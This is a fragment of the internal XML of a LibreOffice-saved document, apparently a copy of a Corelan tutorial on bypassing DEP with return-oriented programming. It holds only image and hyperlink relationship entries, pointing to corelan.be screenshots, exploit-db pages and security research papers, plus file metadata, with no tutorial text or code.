TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image37.png" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image38.png" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image39.png" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image40.png" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image41.png" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image42.png" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image75.png" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image76.png" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ms687393(VS.85).aspx" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ms633548(v=VS.85).aspx" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image77.png" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.corelan.be/advisories.php?id=corelan-10-050" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/13834" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image46.png" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image47.png" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image48.png" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image49.png" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image50.png" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image51.png" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image52.png" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image53.png" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image54.png" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image79.png" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image80.png" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image57.png" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image58.png" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image81.png" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image60.png" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image82.png" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image62.png" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image63.png" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image83.png" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image84.png" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image66.png" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image67.png" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image68.png" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image69.png" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image70.png" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image71.png" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image72.png" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image73.png" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/12495/" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image43.png" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/9329/" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image86.png" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image87.png" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image88.png" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image89.png" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image90.png" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image91.png" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/13905" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dsecrg.com/pages/pub/show.php?id=25" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mastropaolo.com/2005/06/04/buffer-overflow-attacks-bypassing-dep-nxxd-bits-part-1/" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mastropaolo.com/2005/06/05/buffer-overflow-attacks-bypassing-dep-nxxd-bits-part-2-code-injection/" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://trailofbits.files.wordpress.com/2010/04/practical-rop.pdf" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://taossa.com/archive/bh08sotirovdowd.pdf" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.packetstormsecurity.org/papers/general/Windows-DEP-WPM.txt" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hick.org/~mmiller/presentations/misc/exploitation_techniques_and_mitigations_on_windows.pdf" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://uninformed.org/index.cgi?v=2&amp;a=4" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.harmonysecurity.com/2010/04/little-return-oriented-exploitation-on.html" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.harmonysecurity.com/2010/04/little-return-oriented-exploitation-on_16.html" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-usa-07/Moyer/Presentation/bh-usa-07-moyer.pdf" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-usa-07/Moyer/Whitepaper/bh-usa-07-moyer-WP.pdf" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.usenix.org/events/sec09/tech/slides/sotirov.pdf" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/download_pdf/13764" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.insomniasec.com/publications/DEPinDepth.ppt" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/12495" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/12189" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/13756" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/13834" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/13768" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2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TotalTime>
  <Application>LibreOffice/6.4.3.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>72</Pages>
  <Words>21593</Words>
  <Characters>119156</Characters>
  <CharactersWithSpaces>141736</CharactersWithSpaces>
  <Paragraphs>1926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2020-05-05T14:18:27Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>pt-BR</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-05T14:22:23Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>